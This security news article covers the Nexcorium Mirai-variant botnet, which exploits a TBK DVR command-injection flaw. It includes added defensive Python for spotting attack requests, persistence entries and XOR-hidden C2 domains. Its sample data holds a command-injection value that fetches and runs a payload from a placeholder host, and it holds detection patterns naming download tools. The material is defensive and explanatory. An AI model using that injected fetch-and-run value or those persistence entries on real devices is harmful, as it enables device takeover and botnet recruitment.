DVRs Now Turning Into DDoS Attack Infrastructures


The IoT attack surface has never been larger—or more neglected.

This trend was captured by FortiGuard Labs, which tracked a campaign in which a Mirai-variant botnet (dubbed Nexcorium) exploits CVE-2024-3721, a command injection vulnerability in TBK digital video recorders (DVR-4104 and DVR-4216), to establish persistent footholds across multiple Linux architectures.

These devices feature digital video recorders connected to surveillance feeds from CCTV cameras. The malware infection chain impacting the devices is notable less for its novelty than for its components:

  • Staged downloader
  • Obfuscated configuration
  • Self-integrity checks
  • Multiple distinct persistence mechanisms

These attributes combine to ensure that even a remediated device can remain compromised. “The Nexcorium campaign is a precise illustration of why automated scanning alone cannot close the exposure gap,” wrote Trey Ford, Chief Strategy and Trust Officer at Bugcrowd. “Machine speed analysis tells you a vulnerability exists, but human researcher depth tells you how an adversary will chain it, weaponize it, and sustain access long after the initial alert fires.”

Exploitable Infrastructures Often Overlooked

The Nexcorium campaign fingerprint, a custom HTTP header (X-Hacked-By: Nexus Team – Exploited By Erratic), suggests that a motivated, if not yet widely tracked, threat actor is operating with operational consistency. The campaign also illustrates a structural problem, not a tactical one.

Case in point: the botnet's arsenal includes a seven-year-old exploit for Huawei HG532 routers (CVE-2017-17215) alongside current credential-stuffing against default IoT passwords. This combination reflects the enduring reality of unpatched edge devices.

In addition, the botnet’s 10+ DDoS attack vectors—with a centralized command & control (C2) architecture as well as cross-architecture targeting—suggest an operator who is building capacity for coordinated campaigns at scale.

For organizations relying on aging surveillance hardware or unmanaged network-adjacent devices, Nexcorium reminds us of a key point: The most exploitable infrastructure is often the most overlooked.

Ideal Botnet Fodder

Physical hardware with DVR capability—like the TBK security cameras—presents several security weaknesses:

  • Widespread deployments
  • Chronic under-patching
  • Common use of default credentials
  • Network-adjacent positioning bypasses typical endpoint security coverage

Then there’s the gap between device ownership and active security management in enterprise and mid-market environments. It’s no wonder these IoT networks make for ideal botnet fodder.

Entry Point: The Nexcorium Infection Chain

As noted above, the Nexcorium infection chain features the threat-actor attribution artifact <X-Hacked-By: Nexus Team>. This custom HTTP header is a consistent operational signature.

For CVE-2024-3721, the OS command injection occurs through manipulated <mdb> and <mdc> arguments in specific requests sent to the TBK DVR devices. Hackers can then stage delivery via a <dvr> downloader script.

From there, the downloader retrieves payloads built for a range of CPU architectures, including ARM, MIPS, and x86-64.
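As an added defensive illustration (not code from the FortiGuard report or from this article), the check below flags requests that carry the Nexcorium attribution header or shell syntax inside the <mdb>/<mdc> parameters just described. The endpoint name, the TEST-NET address and the sample records are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters and staging tools that have no business inside a DVR query parameter.
SHELL_META = re.compile(r"[;&|`$]|\b(?:wget|curl|tftp)\b|/tmp/|/dev/shm/")

def classify_request(method, path, headers):
    """Return the indicators found in one request; an empty list means nothing matched."""
    findings = []
    hdr = {k.lower(): v for k, v in headers.items()}
    # Campaign fingerprint: the attribution header the article describes.
    if "nexus team" in hdr.get("x-hacked-by", "").lower():
        findings.append("nexcorium-header")
    # CVE-2024-3721 style: injected shell syntax in the mdb/mdc parameters.
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name in ("mdb", "mdc"):
        for value in params.get(name, []):
            if SHELL_META.search(value):
                findings.append(f"cve-2024-3721-style-injection:{name}")
    return findings

def scan(requests):
    """Return (path, findings) for every request that raised at least one indicator."""
    hits = []
    for method, path, headers in requests:
        findings = classify_request(method, path, headers)
        if findings:
            hits.append((path, findings))
    return hits

# Constructed sample records (method, path, headers); the endpoint name and the
# TEST-NET address are placeholders, not values from the report.
SAMPLE_REQUESTS = [
    ("GET", "/index.html", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/dvr-endpoint.cgi?mdb=1&mdc=wget%20http%3A%2F%2F198.51.100.7%2Fdvr%3Bsh%20dvr",
     {"User-Agent": "curl/7.88", "X-Hacked-By": "Nexus Team - Exploited By Erratic"}),
    ("GET", "/dvr-endpoint.cgi?mdb=1&mdc=status", {"User-Agent": "Mozilla/5.0"}),
    ("POST", "/login.cgi", {"X-Hacked-By": "Nexus Team"}),
]

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_REQUESTS):
        print(path, findings)
```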

Built to Stay: Persistence Mechanisms and Evasion Design

To maintain a foothold on a compromised system, the Nexcorium campaign leverages a four-layer persistence strategy:

  • Inittab modification
  • rc.local startup script
  • Systemd service creation
  • Cron job scheduling

Self-integrity checking occurs via FNV-1a hash verification and automatic binary replication under alternate filenames. Forensic analysis and detection are further frustrated by post-persistence binary self-deletion.
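To check the four persistence layers named above on a device image, here is an added example (not the report's tooling) that audits constructed copies of inittab, rc.local, a systemd unit and a crontab for startup entries executing from scratch directories. The directory list and the sample file contents are assumptions.

```python
import re

# Locations a legitimate boot-time service should not normally execute from (assumed list);
# a startup entry pointing under one of these is a strong persistence signal on a DVR.
SUSPICIOUS_PATH = re.compile(r"(?:/tmp|/var/tmp|/dev/shm|/var/run|/mnt)/\S+")

def _active_lines(text):
    """Yield non-empty, non-comment lines with surrounding whitespace removed."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line

def audit_file(path, text):
    """Return (layer, line) findings for one startup-related file."""
    hits = []
    if path == "/etc/inittab":
        for line in _active_lines(text):          # id:runlevels:action:process
            fields = line.split(":", 3)
            if len(fields) == 4 and SUSPICIOUS_PATH.search(fields[3]):
                hits.append(("inittab", line))
    elif path.endswith(".service"):
        for line in _active_lines(text):          # only the command line matters
            if line.startswith("ExecStart") and SUSPICIOUS_PATH.search(line):
                hits.append(("systemd", line))
    elif path == "/etc/rc.local" or "/cron" in path:
        layer = "rc.local" if path == "/etc/rc.local" else "cron"
        for line in _active_lines(text):          # any command line in the script/table
            if SUSPICIOUS_PATH.search(line):
                hits.append((layer, line))
    return hits

def audit_persistence(files):
    """files maps startup-file paths to contents, read from a device image or a live box."""
    return [hit for path, text in files.items() for hit in audit_file(path, text)]

# Constructed sample snapshot; not taken from a real Nexcorium infection.
SAMPLE_FILES = {
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/sbin/getty 115200 ttyS0\n"
                    "::respawn:/tmp/.x/dvr\n",
    "/etc/rc.local": "#!/bin/sh\n/usr/sbin/dvrd &\n/var/tmp/.cache/dvr &\nexit 0\n",
    "/etc/systemd/system/net-watch.service":
        "[Service]\nExecStart=/dev/shm/.net/dvr\n[Install]\nWantedBy=multi-user.target\n",
    "/var/spool/cron/crontabs/root":
        "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n@reboot /tmp/.x/dvr\n",
}

if __name__ == "__main__":
    for layer, line in audit_persistence(SAMPLE_FILES):
        print(f"[{layer}] {line}")
```

Because the binary deletes itself after installing these entries, a startup line whose target no longer exists on disk is itself worth treating as a finding.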

Attack Capacity: DDoS Arsenal and C2 Coordination

The operational design of Nexcorium is consistent with a botnet-for-hire or coordinated disruption capability, not opportunistic infection. The ten distinct DDoS attack vectors include UDP flood, TCP SYN/ACK/PSH/URG floods, SMTP flood, and VSE query flood.

As Nexcorium attacks play out, a hard-coded credential wordlist targets default IoT and router passwords via Telnet brute-force. Architecture detection logic lets the malware propagate across platforms without manual retargeting.

Centralized command and control relies on an XOR-obfuscated C2 domain: the server address is stored encoded in the malware binary and decoded at runtime so the bot can reach its controller. This enables on-demand attack orchestration.
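As an added analyst exercise, not the report's own decoder, the block below recovers an XOR-obfuscated C2 domain from a byte string extracted from a sample by trying every key and keeping only decodings that form a valid hostname, which is how a defender turns the obfuscated address into something to block. It assumes a single-byte key; the key value and the placeholder domain are constructed.

```python
import re

# Hostname shape: dot-separated labels of letters, digits and hyphens, ending in a TLD.
HOSTNAME = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")

def xor_bytes(data, key):
    """XOR every byte with a single-byte key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)

def recover_xor_domains(blob):
    """Try all 256 single-byte keys and keep only decodings that look like hostnames."""
    candidates = []
    for key in range(256):
        try:
            text = xor_bytes(blob, key).decode("ascii")
        except UnicodeDecodeError:
            continue                      # non-ASCII output cannot be a hostname
        if HOSTNAME.match(text.lower()):
            candidates.append((key, text))
    return candidates

# Constructed sample: a placeholder C2 name obfuscated with an assumed key of 0x5A,
# standing in for the encoded string an analyst would carve out of the binary.
ASSUMED_KEY = 0x5A
SAMPLE_BLOB = xor_bytes(b"c2.nexcorium-sample.invalid", ASSUMED_KEY)

if __name__ == "__main__":
    for key, domain in recover_xor_domains(SAMPLE_BLOB):
        print(f"key=0x{key:02x} domain={domain}")
```

A multi-byte key generalizes the same way, with one candidate byte per key position chosen from the decodings that stay inside the hostname alphabet.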

“Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks,” noted John Gallagher, Vice President of Viakoo Labs. “Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally.”

The Structural Lesson: How to Take on the Persistence Problem

The age of a vulnerability is a poor proxy for exploitation risk in unmanaged device categories. Continuous behavioral monitoring is a necessary complement to signature-based detection at the network edge. Only then can organizations account for the gap left by network-adjacent hardware outside the scope of traditional IT asset management.

“What organizations need is continuous adversarial testing that mirrors actual attacker behavior across the full asset inventory, including the devices that security teams have quietly placed out of scope,” said Ford. “While classically true of professional attackers, the next generation of security defense programs will be defined by how aggressively they test the edges, not just the crown jewels.”

Added Gallagher, “Security teams should make sure they have the right foundation for securing IoT devices. Traditional IT cybersecurity solutions don’t work for key functions like asset discovery and vulnerability remediation because they are agent-based. IoT devices don’t allow agents to be hosted on them, so only agentless discovery and remediation solutions can apply.”

Author
  • Jeff Pike, Contributing Writer, Security Buzz
    After majoring in journalism at Northeastern University and working for The Boston Globe, Jeff Pike has collaborated with technical experts in the IT industry for more than 30 years. His technology expertise ranges from cybersecurity to networking, the cloud, and user productivity. Major industry players Jeff has written for include Microsoft, Cisco, Dell, AWS, and Google.